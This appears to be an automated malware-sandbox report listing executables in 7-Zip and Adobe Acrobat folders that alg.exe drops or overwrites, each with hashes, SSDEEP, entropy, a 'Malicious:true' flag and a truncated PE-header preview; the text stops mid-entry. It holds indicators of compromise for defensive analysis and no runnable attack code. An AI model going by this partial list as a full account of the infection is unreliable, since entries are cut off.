                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.2290779036536215
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:pLOS2oTPIXVpsqjnhMgeiCl7G0nehbGZpbD:z/T2Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:139A97F9922CC8BCFECB190EF41356B8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:CD1AE2BE8C6C3509691785B49AD8A46AC8AB4877
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:FA39D926C3AF0E0468F49B8F684E17201D1D9A53602015A9887316EFD454634D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:CCCEB66AF247F4365AE6B80D8C4F92B2235235B00D654D3CF28297B12BECD0A153FC3D10B2F7432840A4C0DF9667638012BB5895013AF0C342B9754C7EBFBE8C
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.031195270163167
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:s1XXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:s1XsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:F6C6B88C3725F83F12473E0EA9E53FDF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:9D7E6C41DF2488B239CD5511CEAFE8BD5EBAECB5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:DE74D09B5D39F60689D6D9C1AD8F701D6BBD18B4C7645E197AD668DC523AA919
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:4268BC7F5B5979306B734948AE2E49625A36A256367F41C5D1EE2004A3289C183F3DF4466BF9D691B26B0B22594A8497407B7C6BBCEC277D621BD380B1F884F1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.711999608857832
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:MRudz8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MAdz8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:630914798FDAC29898A6DD474CB8314A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A1C4DC2853703999F2E7E6B8D495CBD609E622C3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:21DDC45C81A8D5B4F8A820B199997E8F618CE0717CAD12FF1631A4CE6A999AA8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5E68F10173DA6C91DD148F7341C1AD040CB9CCB2CF3FC0EAD42EA84FE7C9CC6151907B6D33AC8746595C2F3E46FB99E78880BDD4B607C503AC24603F82CFCE7D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.082150140204761
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:1vwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:27BD8CB2BC29F6A414698DF81F2B2AC8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:27DF134F69F27AFFC2264319716BD69EAD0E0C1E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A2727453FA47049D5FF20CDCF9AAABC046AB331AB0E706807074A350468C2C79
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6F6733FB90CBBD29059827CFD081E7CEA12C0CF6645197E956B9E827052A6AFD818296D9A5591F2252597C657BFB50A1ECFD8AD9A7123A0DD771306E28347D16
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................c..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.468630380794078
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:V5zhM1XSEVsqjnhMgeiCl7G0nehbGZpbD:RMsoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E7F5E8AEE746130560357D17F00CB8F8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:366C490A4A917062EC35ECB85B7130BC32227DA8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6C8C5D2EEA1F62455EB65CD532163573EAB4CF780FB308650F53FD44C0AFCEB8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:1CEE17542CB8F8327C4405C016755DF22FCD4519E7CD2CDF826FC89AB16DE2AC95C475E7FFF29F59392CA21FA3E532DC4E2161EF44A298FC55058A3B7154AB0D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.......................................... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.499788802909188
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:WtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755KDmg27RN:WjEIa4HIEWOc5UD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:A8BF34195967715310EA92BA868418B0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2C4716E9AEB68B44A288661471D929D11AF83C22
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:36A75CFC1620E97E428C8A753A4451F3855FE12C87823B6E96ED9B46B6B25658
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:9C013624B141449E5DF798DE5B8C39FDB3E4FEC23C514DD089827323C95E9C839A07D7F87D1BDC5CBB71D9AAAD807825486FA6884AACF60C91E24604AFFB9E90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999367300451632
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1572864:zQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:EXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9A058C364E404DA2C5E27D1B1618B20A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FB7DAD476BFB2BAC41249CB7CC259AD80F131746
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:614A27ABC9AF1875CFE4F5055918B49955507F60EE17DCBA10A424218190E0C8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:52333B14705DA66811318E434FE2CED28795A41609FCAF6B6C76C4658AE188A531435074AC28000BD7463C57DDFD24CD9253B0EF50AEC4A6B5E04EAA3D85EADC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.084807899398296
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fWgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:AC8CDEA3609EA17396F05167F20E75E2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6B954DBF596A5E51DE65F94622E40092D4286CF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:95265D3441DA7A4F3551A7A7959A7BBB3F9BA80E187AF8C1D35180CE4B21E174
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:36284471FDC78298F11133D8ECB88EBB92DC0D2AF0C5F3F033BDDF2F5C8562C079680E7F9281AEB081A30A20E376FE49D68D11E94BF5549EFCC7B42FC9CB3710
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......=..... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.386706691841893
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:eDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX8:/nN9KfxLk6GEQTX5UKzNDjD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4185623B4CD68730C65EBA24B4CB3F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F0BA9F474AB9808179BE9D86602A23C8ED26080E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:EC193017DDA7163444BB3501DCA1296C527269DFD5B03C6CB3693EBF19756D31
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6BFD514440B2F8D5D27C1F748E9906B1B6BFED6F0A1D576CD16F374C5B0D8693829F65965264ED261FC13972F60C207D24CC7A36FAF74043333A3D5D54F995BD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......@_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.041483387523454
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:aNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0F0FAC3B05B020E9601890B4083C7DEA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:0AE6B2513F64F08D81DD88BBA0A1A2FA8C7C8F8B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B83833F1BD43DB993DCEF27AC11CE78D748291A20C7066D818B3D1CE14561566
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:57407D8041120B865021DA8AE5FCE5483779D17C0DDF0DB58908B8D5E6F44F7FF91250FB98FA164D3CA347D13DBBC03E1F2D57255B39DAD7337758B4305AD3A4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.596680962421033
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:Eb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgK6D527BWG:2nPgTHIwZoRBk9DdhSUEVIXgK6VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:10664A9E5BBBFA08F333D8549F4150B1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:9FA0CEEFECFFBC94588D773C3810DFE6F5ED78BA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:51ADBC7BC2881DF800F0E4374D1B9BA020AF7241A36F2DB26737C1DF5A848DFF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FD530268E676897F75F02F866C94E7AC048CF4C57D996A6FB46F1B0E8DED786E0D2BB7B7A3AE2C16B90385FA2188E531D8CCE0B5E9631A59B6B391C634509647
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................F.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.281823268545724
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Cg5FvCPusGsqjnhMgeiCl7G0nehbGZpbD:Tft9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2F7E1EC6F94CA16CCD6FE6C5EFB1D7F0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:39B4284D6D6C2E61ABEDE24FEAE8C439AC8CED1C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:852CC4469DC35061959D2859082C6F3D9C726F36DB720E26A746B4533573E187
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:547DB74B64A0A9F605847858B5CC9959A33EDB65D1C0A7C3AE93B1F5F092EBF4CC0ECC44965BED5F9F313B485E4B6A545999EDB8BD5B4B3790D856282C34F6C9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.208903911815308
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:VjKTIsAjFuvtIfmFthMaT5U8aChaeuUsqjnhMgeiCl7G0nehbGZpbD:VjIMmPh7TT79lDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:28482DD0290092577A63AE2A4F8EA2D3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:90C1A09825964295895404D07E987ADED64B4194
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3D133D97B13D5D7EA6FD5A055B88325A17244701302A1A60E0D2EBC434A3ABC7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:060052F546C4D504848774A548C13F218213E9146877FCB887F75D15F148D9D9CC6AA196E1B081E3C2CD63360B888B355EA8FDB87A879A636DB58F20550A991E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....jN.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
